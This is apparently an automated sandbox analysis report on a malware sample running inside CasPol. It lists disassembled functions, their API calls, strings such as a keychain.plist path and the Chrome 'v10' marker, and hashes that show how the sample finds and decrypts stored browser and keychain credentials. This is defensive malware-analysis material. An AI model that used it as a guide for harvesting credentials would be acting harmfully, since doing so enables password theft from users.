                                                                                                                                                                                  Function 00404423 Relevance: 4.6, APIs: 3, Instructions: 51libraryencryptionloaderCOMMON
                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                  APIs
                                                                                                                                                                                  • CryptUnprotectData.CRYPT32(?,00000000,?,00000000,00000000,?,?,?,00000000,?,004026E9,?,?,00000000,?), ref: 00404498
                                                                                                                                                                                    • Part of subcall function 0040A804: memset.MSVCRT ref: 0040A824
                                                                                                                                                                                    • Part of subcall function 0040A804: GetSystemDirectoryW.KERNEL32(0045DE68,00000104,?,?,?), ref: 0040A841
                                                                                                                                                                                    • Part of subcall function 0040A804: wcscpy.MSVCRT ref: 0040A854
                                                                                                                                                                                    • Part of subcall function 0040A804: wcscat.MSVCRT ref: 0040A86A
                                                                                                                                                                                    • Part of subcall function 0040A804: LoadLibraryW.KERNEL32(00000000), ref: 0040A87B
                                                                                                                                                                                    • Part of subcall function 0040A804: LoadLibraryW.KERNEL32(?), ref: 0040A884
                                                                                                                                                                                  • GetProcAddress.KERNEL32(?,00000000,00000141,?,00000000,?,004026E9,?,?,00000000,?), ref: 00404453
                                                                                                                                                                                  • FreeLibrary.KERNEL32(00000000,00000141,?,00000000,?,004026E9,?,?,00000000,?), ref: 00404476
                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                  • Source File: 0000001E.00000002.533158052.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                  • Snapshot File: hcaresult_30_2_400000_CasPol.jbxd
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID: Library$Load$AddressCryptDataDirectoryFreeProcSystemUnprotectmemsetwcscatwcscpy
                                                                                                                                                                                  • String ID:
                                                                                                                                                                                  • API String ID: 767404330-0
                                                                                                                                                                                  • Opcode ID: 1380316316acfdf23ecbbce53536a9302c8f7369fa9bad9ede14c1568be36e2a
                                                                                                                                                                                  • Instruction ID: e973b1bd6c29085855c002f2d91bff7161adaf38cfdf5e3d51a6561f1cc66020
                                                                                                                                                                                  • Opcode Fuzzy Hash: 1380316316acfdf23ecbbce53536a9302c8f7369fa9bad9ede14c1568be36e2a
                                                                                                                                                                                  • Instruction Fuzzy Hash: D90192B1100211AAD6319FA6CC04D1BFAE9EFC0750B20883FF1D9E25A0D7B49881DB69
                                                                                                                                                                                  Function 0040AE51 Relevance: 3.0, APIs: 2, Instructions: 39fileCOMMON
                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                  APIs
                                                                                                                                                                                  • FindFirstFileW.KERNELBASE(?,?,?,00000000,00445F58,*.*,?,00000000,?,00000104,?,?,?,?,?,00000104), ref: 0040AE67
                                                                                                                                                                                  • FindNextFileW.KERNELBASE(?,?,?,00000000,00445F58,*.*,?,00000000,?,00000104,?,?,?,?,?,00000104), ref: 0040AE83
                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                  • Source File: 0000001E.00000002.533158052.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                  • Snapshot File: hcaresult_30_2_400000_CasPol.jbxd
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID: FileFind$FirstNext
                                                                                                                                                                                  • String ID:
                                                                                                                                                                                  • API String ID: 1690352074-0
                                                                                                                                                                                  • Opcode ID: 561b3503b5d493cb0f99635c99673ff26dffc0bbfdea02a94e907e6f5a7ee62d
                                                                                                                                                                                  • Instruction ID: bc213c2af839868520f9a45b85e911a0cf9bcc257b6b56acf9ba21b23a9e6198
                                                                                                                                                                                  • Opcode Fuzzy Hash: 561b3503b5d493cb0f99635c99673ff26dffc0bbfdea02a94e907e6f5a7ee62d
                                                                                                                                                                                  • Instruction Fuzzy Hash: 34F0C877040B005BD761C774D8489C733D89F84320B20063EF56AD32C0EB3899098755
                                                                                                                                                                                  Function 00418981 Relevance: 3.0, APIs: 2, Instructions: 28COMMON
                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                  APIs
                                                                                                                                                                                  • memset.MSVCRT ref: 0041898C
                                                                                                                                                                                  • GetSystemInfo.KERNELBASE(004725C0,?,00000000,004439D6,?,00445FAE,?,?,?,?,?,?), ref: 00418995
                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                  • Source File: 0000001E.00000002.533158052.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                  • Snapshot File: hcaresult_30_2_400000_CasPol.jbxd
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID: InfoSystemmemset
                                                                                                                                                                                  • String ID:
                                                                                                                                                                                  • API String ID: 3558857096-0
                                                                                                                                                                                  • Opcode ID: d0407614e71e7ae135e22cefa727abc0102cb379ef2ade91b8070469c4ed11d1
                                                                                                                                                                                  • Instruction ID: bf8bfd662ffca2911032058da6995c9eeb4a28626cb6ee34ade21af96d3a2c90
                                                                                                                                                                                  • Opcode Fuzzy Hash: d0407614e71e7ae135e22cefa727abc0102cb379ef2ade91b8070469c4ed11d1
                                                                                                                                                                                  • Instruction Fuzzy Hash: C0E06531A0163097F22077766C067DF25949F41395F04407BB9049A186EBAC4D8546DE
                                                                                                                                                                                  Function 0044553B Relevance: 44.5, APIs: 23, Strings: 2, Instructions: 758COMMON
                                                                                                                                                                                  Download Yara Rule

                                                                                                                                                                                  Control-flow Graph

                                                                                                                                                                                  • Executed
                                                                                                                                                                                  • Not Executed
                                                                                                                                                                                  control_flow_graph 0 44553b-445558 call 44db70 3 445599-4455a2 0->3 4 44555a-44557c call 40c768 call 40bdb0 call 4135f7 0->4 5 4455a8-4455e3 memset call 403988 wcsrchr 3->5 6 4457fb 3->6 44 44558e-445594 call 444b06 4->44 45 44557e-445580 call 4136c0 4->45 15 4455e5 5->15 16 4455e8-4455f9 5->16 10 445800-445809 6->10 13 445856-44585f 10->13 14 44580b-44581e call 40a889 call 403e2d 10->14 18 445861-445874 call 40a889 call 403c9c 13->18 19 4458ac-4458b5 13->19 37 445823-445826 14->37 15->16 21 445672-445683 call 40a889 call 403fbe 16->21 22 4455fb-445601 16->22 49 445879-44587c 18->49 23 44594f-445958 19->23 24 4458bb-44592b memset * 2 call 414c2e call 40b2cc call 409d1f call 409b98 19->24 82 445685 21->82 83 4456b2-4456b5 call 40b1ab 21->83 31 445605-445607 22->31 32 445603 22->32 29 4459f2-4459fa 23->29 30 44595e-4459ce memset * 2 call 414c2e call 40b2cc call 409d1f call 409b98 23->30 132 44592d-445945 call 40b6ef 24->132 133 44594a 24->133 39 445a00-445aa1 memset * 2 call 414c2e call 40b2cc call 409d1f call 40b2cc call 40ae18 29->39 40 445b29-445b32 29->40 151 4459d0-4459e8 call 40b6ef 30->151 152 4459ed 30->152 31->21 43 445609-44560d 31->43 32->31 50 44584c-445854 call 40b1ab 37->50 51 445828 37->51 181 445b08-445b15 call 40ae51 39->181 52 445c7c-445c85 40->52 53 445b38-445b96 memset * 3 40->53 43->21 47 44560f-445641 call 4087b3 call 40a889 call 4454bf 43->47 44->3 63 445585-44558c call 41366b 45->63 148 445665-445670 call 40b1ab 47->148 149 445643-445663 call 40a9b5 call 4087b3 47->149 64 4458a2-4458aa call 40b1ab 49->64 65 44587e 49->65 50->13 66 44582e-445847 call 40a9b5 call 4087b3 51->66 59 445d1c-445d25 52->59 60 445c8b-445cf3 memset * 2 call 414c2e call 409d1f call 409b98 52->60 67 445bd4-445c72 call 414c2e call 40b2cc call 409d1f call 445389 call 40b2cc call 409d1f call 445389 call 40b2cc call 409d1f call 445389 53->67 68 445b98-445ba0 53->68 87 445fae-445fb2 59->87 88 445d2b-445d3b 59->88 167 445cf5 60->167 168 445cfc-445d03 60->168 63->44 64->19 80 445884-44589d call 40a9b5 call 4087b3 65->80 135 445849 66->135 247 445c77 67->247 68->67 81 445ba2-445bcf call 4099c6 call 445403 call 445389 68->81 154 44589f 80->154 81->52 97 44568b-4456a4 call 40a9b5 call 4087b3 82->97 114 4456ba-4456c4 83->114 102 445d3d-445d65 call 409c52 call 40b2cc _wcsicmp 88->102 103 445d88-445e15 memset * 3 call 414c2e call 40b2cc call 409d1f call 409b98 88->103 156 4456a9-4456b0 97->156 161 445d67-445d6c 102->161 162 445d71-445d83 call 445093 102->162 196 445e17 103->196 197 445e1e-445e25 103->197 128 4457f9 114->128 129 4456ca-4456d3 call 413cfa call 413d4c 114->129 128->6 172 4456d8-4456f7 call 40b2cc call 413fa6 129->172 132->133 133->23 135->50 148->114 149->148 151->152 152->29 154->64 156->83 156->97 174 445fa1-445fa9 call 40b6ef 161->174 162->87 167->168 179 445d05-445d13 168->179 180 445d17 168->180 205 4456fd-445796 memset * 4 call 409c70 * 3 172->205 206 4457ea-4457f7 call 413d29 172->206 174->87 179->180 180->59 200 445b17-445b27 call 40aebe 181->200 201 445aa3-445ab0 call 40add4 181->201 196->197 202 445e27-445e59 call 40b2cc call 409d1f call 409b98 197->202 203 445e6b-445e7e call 445093 197->203 200->40 201->181 218 445ab2-445b03 memset call 40b2cc call 409d1f call 445389 201->218 242 445e62-445e69 202->242 243 445e5b 202->243 223 445f67-445f99 call 40b2cc call 409d1f call 409b98 203->223 205->206 246 445798-4457ca call 40b2cc call 409d1f call 409b98 205->246 206->10 218->181 223->87 255 445f9b 223->255 242->203 248 445e83-445ef5 memset call 40b2cc call 409d1f call 40ae18 242->248 243->242 246->206 265 4457cc-4457e5 call 4087b3 246->265 247->52 264 445f4d-445f5a call 40ae51 248->264 255->174 269 445ef7-445f04 call 40add4 264->269 270 445f5c-445f62 call 40aebe 264->270 265->206 269->264 274 445f06-445f38 call 40b2cc call 409d1f call 409b98 269->274 270->223 274->264 281 445f3a-445f48 call 445093 274->281 281->264
                                                                                                                                                                                  APIs
                                                                                                                                                                                  • memset.MSVCRT ref: 004455C2
                                                                                                                                                                                  • wcsrchr.MSVCRT ref: 004455DA
                                                                                                                                                                                  • memset.MSVCRT ref: 0044570D
                                                                                                                                                                                  • memset.MSVCRT ref: 00445725
                                                                                                                                                                                    • Part of subcall function 0040C768: _wcslwr.MSVCRT ref: 0040C817
                                                                                                                                                                                    • Part of subcall function 0040C768: wcslen.MSVCRT ref: 0040C82C
                                                                                                                                                                                    • Part of subcall function 0040BDB0: wcslen.MSVCRT ref: 0040BE06
                                                                                                                                                                                    • Part of subcall function 0040BDB0: wcsncmp.MSVCRT ref: 0040BE38
                                                                                                                                                                                    • Part of subcall function 0040BDB0: memset.MSVCRT ref: 0040BE91
                                                                                                                                                                                    • Part of subcall function 0040BDB0: memcpy.MSVCRT(?,?,?,00000001,?,?,?,00000000,?), ref: 0040BEB2
                                                                                                                                                                                    • Part of subcall function 004135F7: GetProcAddress.KERNEL32(?,00000000,000000F1,00000000,0044557A,?,?,?,?,?,00403335,?), ref: 0041362A
                                                                                                                                                                                  • memset.MSVCRT ref: 0044573D
                                                                                                                                                                                  • memset.MSVCRT ref: 00445755
                                                                                                                                                                                  • memset.MSVCRT ref: 004458CB
                                                                                                                                                                                  • memset.MSVCRT ref: 004458E3
                                                                                                                                                                                  • memset.MSVCRT ref: 0044596E
                                                                                                                                                                                  • memset.MSVCRT ref: 00445A10
                                                                                                                                                                                  • memset.MSVCRT ref: 00445A28
                                                                                                                                                                                  • memset.MSVCRT ref: 00445AC6
                                                                                                                                                                                    • Part of subcall function 00414C2E: SHGetSpecialFolderPathW.SHELL32(00000000,?,0000001A,00000000,?,00000000), ref: 00414C68
                                                                                                                                                                                    • Part of subcall function 00445093: GetFileSize.KERNEL32(00000000,00000000,?,00000000,00000104,00445E7E,?,?,?,?,00000104), ref: 004450AA
                                                                                                                                                                                    • Part of subcall function 00445093: ??2@YAPAXI@Z.MSVCRT ref: 004450BE
                                                                                                                                                                                    • Part of subcall function 00445093: memset.MSVCRT ref: 004450CD
                                                                                                                                                                                    • Part of subcall function 00445093: ??3@YAXPAX@Z.MSVCRT(00000000,?,?,?,?,?,?,?,?,00000104), ref: 004450F0
                                                                                                                                                                                    • Part of subcall function 00445093: CloseHandle.KERNEL32(00000000), ref: 004450F7
                                                                                                                                                                                  • memset.MSVCRT ref: 00445B52
                                                                                                                                                                                  • memset.MSVCRT ref: 00445B6A
                                                                                                                                                                                  • memset.MSVCRT ref: 00445C9B
                                                                                                                                                                                  • memset.MSVCRT ref: 00445CB3
                                                                                                                                                                                  • _wcsicmp.MSVCRT ref: 00445D56
                                                                                                                                                                                  • memset.MSVCRT ref: 00445B82
                                                                                                                                                                                    • Part of subcall function 0040B6EF: memset.MSVCRT ref: 0040B71C
                                                                                                                                                                                    • Part of subcall function 0040B6EF: wcsrchr.MSVCRT ref: 0040B738
                                                                                                                                                                                    • Part of subcall function 0040B6EF: memset.MSVCRT ref: 0040B756
                                                                                                                                                                                    • Part of subcall function 0040B6EF: memset.MSVCRT ref: 0040B7F5
                                                                                                                                                                                    • Part of subcall function 0040B6EF: CreateFileW.KERNELBASE(00445FAE,80000000,00000000,00000000,00000003,00000000,00000000), ref: 0040B80C
                                                                                                                                                                                    • Part of subcall function 0040ADD4: wcscmp.MSVCRT ref: 0040ADF3
                                                                                                                                                                                    • Part of subcall function 0040ADD4: wcscmp.MSVCRT ref: 0040AE04
                                                                                                                                                                                  • memset.MSVCRT ref: 00445986
                                                                                                                                                                                    • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D29
                                                                                                                                                                                    • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D33
                                                                                                                                                                                    • Part of subcall function 00409D1F: wcscpy.MSVCRT ref: 00409D47
                                                                                                                                                                                    • Part of subcall function 00409D1F: wcscat.MSVCRT ref: 00409D55
                                                                                                                                                                                    • Part of subcall function 00409B98: GetFileAttributesW.KERNELBASE(?,00445E12,?,?,?,00000104), ref: 00409B9C
                                                                                                                                                                                  Strings
                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                  • Source File: 0000001E.00000002.533158052.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                  • Snapshot File: hcaresult_30_2_400000_CasPol.jbxd
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID: memset$wcslen$File$wcscmpwcsrchr$??2@??3@AddressAttributesCloseCreateFolderHandlePathProcSizeSpecial_wcsicmp_wcslwrmemcpywcscatwcscpywcsncmp
                                                                                                                                                                                  • String ID: *.*$Apple Computer\Preferences\keychain.plist
                                                                                                                                                                                  • API String ID: 4101496090-3798722523
                                                                                                                                                                                  • Opcode ID: 54cd37d9fea90df649edfac64ca330d920c47cac007ddae39c26186bf891e53c
                                                                                                                                                                                  • Instruction ID: 0d822d17a5609fa1e1b699618fc72e24fb48bc28b5d87ede4d5502c71e25afa2
                                                                                                                                                                                  • Opcode Fuzzy Hash: 54cd37d9fea90df649edfac64ca330d920c47cac007ddae39c26186bf891e53c
                                                                                                                                                                                  • Instruction Fuzzy Hash: ED4278B29005196BEB10E761DD46EDFB37CEF45358F1001ABF508A2193EB385E948B9A
                                                                                                                                                                                  Function 0041276D Relevance: 35.1, APIs: 17, Strings: 3, Instructions: 149COMMON
                                                                                                                                                                                  Download Yara Rule

                                                                                                                                                                                  Control-flow Graph

                                                                                                                                                                                  APIs
                                                                                                                                                                                    • Part of subcall function 004044A4: LoadLibraryW.KERNEL32(comctl32.dll), ref: 004044C3
                                                                                                                                                                                    • Part of subcall function 004044A4: GetProcAddress.KERNEL32(00000000,InitCommonControlsEx), ref: 004044D5
                                                                                                                                                                                    • Part of subcall function 004044A4: FreeLibrary.KERNEL32(00000000), ref: 004044E9
                                                                                                                                                                                    • Part of subcall function 004044A4: MessageBoxW.USER32(00000001,Error: Cannot load the common control classes.,Error,00000030), ref: 00404514
                                                                                                                                                                                  • SetErrorMode.KERNELBASE(00008001), ref: 00412799
                                                                                                                                                                                  • GetModuleHandleW.KERNEL32(00000000,0041493C,00000000), ref: 004127B2
                                                                                                                                                                                  • EnumResourceTypesW.KERNEL32(00000000), ref: 004127B9
                                                                                                                                                                                  Strings
                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                  • Source File: 0000001E.00000002.533158052.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                  • Snapshot File: hcaresult_30_2_400000_CasPol.jbxd
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID: Library$AddressEnumErrorFreeHandleLoadMessageModeModuleProcResourceTypes
                                                                                                                                                                                  • String ID: $/deleteregkey$/savelangfile
                                                                                                                                                                                  • API String ID: 2744995895-28296030
                                                                                                                                                                                  • Opcode ID: 72338f9f39f0fed86814d702f01b1d2779e3084bd08ead6f54537fd18a2fe269
                                                                                                                                                                                  • Instruction ID: bb1d383b9f388563dc7403a66819e695bb2bbb53a4e653fbe84b6d7681309d95
                                                                                                                                                                                  • Opcode Fuzzy Hash: 72338f9f39f0fed86814d702f01b1d2779e3084bd08ead6f54537fd18a2fe269
                                                                                                                                                                                  • Instruction Fuzzy Hash: FC51BEB1608346ABD710AFA6DD88A9F77ECFF81304F40092EF644D2161D778E8558B2A
                                                                                                                                                                                  Function 0040B6EF Relevance: 30.1, APIs: 15, Strings: 2, Instructions: 388fileCOMMON
                                                                                                                                                                                  Download Yara Rule

                                                                                                                                                                                  Control-flow Graph

                                                                                                                                                                                  APIs
                                                                                                                                                                                  • memset.MSVCRT ref: 0040B71C
                                                                                                                                                                                    • Part of subcall function 00409C70: wcscpy.MSVCRT ref: 00409C75
                                                                                                                                                                                    • Part of subcall function 00409C70: wcsrchr.MSVCRT ref: 00409C7D
                                                                                                                                                                                  • wcsrchr.MSVCRT ref: 0040B738
                                                                                                                                                                                  • memset.MSVCRT ref: 0040B756
                                                                                                                                                                                  • memset.MSVCRT ref: 0040B7F5
                                                                                                                                                                                  • CreateFileW.KERNELBASE(00445FAE,80000000,00000000,00000000,00000003,00000000,00000000), ref: 0040B80C
                                                                                                                                                                                  • CopyFileW.KERNEL32(00445FAE,?,00000000), ref: 0040B82D
                                                                                                                                                                                  • CloseHandle.KERNELBASE(00000000), ref: 0040B838
                                                                                                                                                                                  • memset.MSVCRT ref: 0040B851
                                                                                                                                                                                  • memset.MSVCRT ref: 0040B8CA
                                                                                                                                                                                  • memcmp.MSVCRT ref: 0040B9BF
                                                                                                                                                                                    • Part of subcall function 00404423: GetProcAddress.KERNEL32(?,00000000,00000141,?,00000000,?,004026E9,?,?,00000000,?), ref: 00404453
                                                                                                                                                                                    • Part of subcall function 00404423: FreeLibrary.KERNEL32(00000000,00000141,?,00000000,?,004026E9,?,?,00000000,?), ref: 00404476
                                                                                                                                                                                    • Part of subcall function 00404423: CryptUnprotectData.CRYPT32(?,00000000,?,00000000,00000000,?,?,?,00000000,?,004026E9,?,?,00000000,?), ref: 00404498
                                                                                                                                                                                  • DeleteFileW.KERNEL32(?,?,?,?,?,?,?,?,?,?), ref: 0040BAE5
                                                                                                                                                                                  • memset.MSVCRT ref: 0040BB53
                                                                                                                                                                                  • memcpy.MSVCRT(?,00000000,?,00000000,00000000,?), ref: 0040BB66
                                                                                                                                                                                  • LocalFree.KERNEL32(00000000,?,?,?,00000000,00000000,?), ref: 0040BB8D
                                                                                                                                                                                  Strings
                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                  • Source File: 0000001E.00000002.533158052.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                  • Snapshot File: hcaresult_30_2_400000_CasPol.jbxd
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID: memset$File$Freewcsrchr$AddressCloseCopyCreateCryptDataDeleteHandleLibraryLocalProcUnprotectmemcmpmemcpywcscpy
                                                                                                                                                                                  • String ID: chp$v10
                                                                                                                                                                                  • API String ID: 1297422669-2783969131
                                                                                                                                                                                  • Opcode ID: 0f77db0472bd63cf26258024439ab2a975461d6804070ba6b678b1f2ee2b0392
                                                                                                                                                                                  • Instruction ID: 8b5aa87907ec6e815121f1c024adfc7170cbdef62e19f7af032d1a0a82a34a86
                                                                                                                                                                                  • Opcode Fuzzy Hash: 0f77db0472bd63cf26258024439ab2a975461d6804070ba6b678b1f2ee2b0392
                                                                                                                                                                                  • Instruction Fuzzy Hash: 32D17372900218AFEB11EB95DC41EEE77B8EF44304F1044BAF509B7191DB789F858B99
                                                                                                                                                                                  Function 0040E01E Relevance: 22.9, APIs: 12, Strings: 1, Instructions: 120fileCOMMON
                                                                                                                                                                                  Download Yara Rule

                                                                                                                                                                                  Control-flow Graph

                                                                                                                                                                                  APIs
                                                                                                                                                                                    • Part of subcall function 0040DD85: memset.MSVCRT ref: 0040DDAD
                                                                                                                                                                                    • Part of subcall function 0040DD85: CreateFileW.KERNELBASE(?,80000000,00000003,00000000,00000003,00000000,00000000), ref: 0040DDD4
                                                                                                                                                                                    • Part of subcall function 0040DD85: NtQuerySystemInformation.NTDLL(00000010,00000104,00001000,00000000,?,000000FF,00000000,00000104), ref: 0040DE15
                                                                                                                                                                                    • Part of subcall function 0040DD85: CloseHandle.KERNELBASE(C0000004), ref: 0040DE3E
                                                                                                                                                                                    • Part of subcall function 0040DD85: GetCurrentProcessId.KERNEL32(?,000000FF,00000000,00000104), ref: 0040DE49
                                                                                                                                                                                    • Part of subcall function 0040DD85: _wcsicmp.MSVCRT ref: 0040DEB2
                                                                                                                                                                                    • Part of subcall function 0040AFCF: ??2@YAPAXI@Z.MSVCRT ref: 0040AFD8
                                                                                                                                                                                  • OpenProcess.KERNEL32(00000040,00000000,00000000,00000104,?,00000000,00000104,?,00000000,00000104,00000000), ref: 0040E093
                                                                                                                                                                                  • GetCurrentProcess.KERNEL32(?,80000000,00000000,00000000), ref: 0040E0B2
                                                                                                                                                                                  • DuplicateHandle.KERNEL32(?,00000104,00000000), ref: 0040E0BF
                                                                                                                                                                                  • GetFileSize.KERNEL32(?,00000000), ref: 0040E0D4
                                                                                                                                                                                    • Part of subcall function 00409A45: GetTempPathW.KERNEL32(00000104,?), ref: 00409A5C
                                                                                                                                                                                    • Part of subcall function 00409A45: GetWindowsDirectoryW.KERNEL32(?,00000104), ref: 00409A6E
                                                                                                                                                                                    • Part of subcall function 00409A45: GetTempFileNameW.KERNELBASE(?,0040B827,00000000,?), ref: 00409A85
                                                                                                                                                                                    • Part of subcall function 004096DC: CreateFileW.KERNELBASE(00000001,40000000,00000001,00000000,00000002,00000000,00000000), ref: 004096EE
                                                                                                                                                                                  • CreateFileMappingW.KERNELBASE(?,00000000,00000002,00000000,00000000,00000000), ref: 0040E0FE
                                                                                                                                                                                  • MapViewOfFile.KERNELBASE(00000000,00000004,00000000,00000000,00000104), ref: 0040E113
                                                                                                                                                                                  • WriteFile.KERNELBASE(00000000,00000000,00000104,0040E6A3,00000000), ref: 0040E12E
                                                                                                                                                                                  • UnmapViewOfFile.KERNELBASE(00000000), ref: 0040E135
                                                                                                                                                                                  • CloseHandle.KERNELBASE(?), ref: 0040E13E
                                                                                                                                                                                  • CloseHandle.KERNEL32(00000000), ref: 0040E143
                                                                                                                                                                                  • CloseHandle.KERNEL32(?), ref: 0040E148
                                                                                                                                                                                  • CloseHandle.KERNEL32(?), ref: 0040E14D
                                                                                                                                                                                  Strings
                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                  • Source File: 0000001E.00000002.533158052.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                  • Snapshot File: hcaresult_30_2_400000_CasPol.jbxd
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID: File$Handle$Close$CreateProcess$CurrentTempView$??2@DirectoryDuplicateInformationMappingNameOpenPathQuerySizeSystemUnmapWindowsWrite_wcsicmpmemset
                                                                                                                                                                                  • String ID: bhv
                                                                                                                                                                                  • API String ID: 4234240956-2689659898
                                                                                                                                                                                  • Opcode ID: c96677cf1f2b88af9f6f98c954d74ea01aac065ab95576d822b7ccb478d5ef78
                                                                                                                                                                                  • Instruction ID: 69536691d8562172d0558c987aea6dfe4ed17d6a9a6de0cf2c6621a9a97a0e87
                                                                                                                                                                                  • Opcode Fuzzy Hash: c96677cf1f2b88af9f6f98c954d74ea01aac065ab95576d822b7ccb478d5ef78
                                                                                                                                                                                  • Instruction Fuzzy Hash: 15412775800218FBCF119FA6CC489DFBFB9FF09750F148466F504A6250D7748A50CBA8
                                                                                                                                                                                  Function 00413F4F Relevance: 19.3, APIs: 5, Strings: 6, Instructions: 29libraryloaderCOMMON
                                                                                                                                                                                  Download Yara Rule

                                                                                                                                                                                  Control-flow Graph

                                                                                                                                                                                  • Executed
                                                                                                                                                                                  • Not Executed
                                                                                                                                                                                  control_flow_graph 560 413f4f-413f52 561 413fa5 560->561 562 413f54-413f5a call 40a804 560->562 564 413f5f-413fa4 GetProcAddress * 5 562->564 564->561
                                                                                                                                                                                  APIs
                                                                                                                                                                                    • Part of subcall function 0040A804: memset.MSVCRT ref: 0040A824
                                                                                                                                                                                    • Part of subcall function 0040A804: GetSystemDirectoryW.KERNEL32(0045DE68,00000104,?,?,?), ref: 0040A841
                                                                                                                                                                                    • Part of subcall function 0040A804: wcscpy.MSVCRT ref: 0040A854
                                                                                                                                                                                    • Part of subcall function 0040A804: wcscat.MSVCRT ref: 0040A86A
                                                                                                                                                                                    • Part of subcall function 0040A804: LoadLibraryW.KERNEL32(00000000), ref: 0040A87B
                                                                                                                                                                                    • Part of subcall function 0040A804: LoadLibraryW.KERNEL32(?), ref: 0040A884
                                                                                                                                                                                  • GetProcAddress.KERNEL32(00000000,psapi.dll,00000000,00413F2F,00000000,00413E1F,00000000,?), ref: 00413F6F
                                                                                                                                                                                  • GetProcAddress.KERNEL32(?,EnumProcessModules), ref: 00413F7B
                                                                                                                                                                                  • GetProcAddress.KERNEL32(?,GetModuleFileNameExW), ref: 00413F87
                                                                                                                                                                                  • GetProcAddress.KERNEL32(?,EnumProcesses), ref: 00413F93
                                                                                                                                                                                  • GetProcAddress.KERNEL32(?,GetModuleInformation), ref: 00413F9F
                                                                                                                                                                                  Strings
                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                  • Source File: 0000001E.00000002.533158052.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                  • Snapshot File: hcaresult_30_2_400000_CasPol.jbxd
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID: AddressProc$LibraryLoad$DirectorySystemmemsetwcscatwcscpy
                                                                                                                                                                                  • String ID: EnumProcessModules$EnumProcesses$GetModuleBaseNameW$GetModuleFileNameExW$GetModuleInformation$psapi.dll
                                                                                                                                                                                  • API String ID: 2941347001-70141382
                                                                                                                                                                                  • Opcode ID: 5f55386481140187343ab1ab8adea668b022a311609f89b9ad52cbba2c200a76
                                                                                                                                                                                  • Instruction ID: 7b3d606b7d389a8205b465373562f67d85acf78e859b2fe1c5436fc88fb80995
                                                                                                                                                                                  • Opcode Fuzzy Hash: 5f55386481140187343ab1ab8adea668b022a311609f89b9ad52cbba2c200a76
                                                                                                                                                                                  • Instruction Fuzzy Hash: BBF03470840340AECB706F769809E06BEF0EFD8B097318C2EE6C557291E3BD9098DE48
                                                                                                                                                                                  Function 004466F4 Relevance: 18.1, APIs: 12, Instructions: 134COMMON
                                                                                                                                                                                  Download Yara Rule

                                                                                                                                                                                  Control-flow Graph

                                                                                                                                                                                  • Executed
                                                                                                                                                                                  • Not Executed
                                                                                                                                                                                  control_flow_graph 565 4466f4-44670e call 446904 GetModuleHandleA 568 446710-44671b 565->568 569 44672f-446732 565->569 568->569 570 44671d-446726 568->570 571 44675b-4467aa __set_app_type __p__fmode __p__commode call 4153f2 569->571 573 446747-44674b 570->573 574 446728-44672d 570->574 578 4467ac-4467b7 __setusermatherr 571->578 579 4467b8-44680e call 4468f0 _initterm __wgetmainargs _initterm 571->579 573->569 577 44674d-44674f 573->577 574->569 576 446734-44673b 574->576 576->569 580 44673d-446745 576->580 581 446755-446758 577->581 578->579 584 446810-446819 579->584 585 44681e-446825 579->585 580->581 581->571 586 4468d8-4468dd call 44693d 584->586 587 446827-446832 585->587 588 44686c-446870 585->588 591 446834-446838 587->591 592 44683a-44683e 587->592 589 446845-44684b 588->589 590 446872-446877 588->590 596 446853-446864 GetStartupInfoW 589->596 597 44684d-446851 589->597 590->588 591->587 591->592 592->589 594 446840-446842 592->594 594->589 598 446866-44686a 596->598 599 446879-44687b 596->599 597->594 597->596 600 44687c-446894 GetModuleHandleA call 41276d 598->600 599->600 603 446896-446897 exit 600->603 604 44689d-4468d6 _cexit 600->604 603->604 604->586
                                                                                                                                                                                  APIs
                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                  • Source File: 0000001E.00000002.533158052.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                  • Snapshot File: hcaresult_30_2_400000_CasPol.jbxd
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID: HandleModule_initterm$InfoStartup__p__commode__p__fmode__set_app_type__setusermatherr__wgetmainargs_cexitexit
                                                                                                                                                                                  • String ID:
                                                                                                                                                                                  • API String ID: 2827331108-0
